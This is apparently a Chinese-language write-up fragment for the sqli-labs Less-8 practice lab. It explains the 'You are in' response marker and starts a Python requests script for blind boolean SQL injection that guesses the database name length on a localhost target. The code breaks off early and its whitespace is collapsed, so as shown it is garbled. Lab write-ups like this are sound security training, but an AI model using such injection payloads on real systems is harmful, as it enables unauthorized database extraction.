可以发现这里请求的响应是html代码,所以页面正常的话一定会有‘you are in’在响应中,再使用request或者requests库就能实现,于是去网上找了脚本简单修改了下,直接贴代码吧
import requests
# 获取数据库名长度defdatabase_len():for i inrange(1,10):
url = f"http://localhost:90/sqli-labs-master/Less-8/?id=1' and length(database())>{i}"
r = requests.get(url +'%23')if'You are in'notin r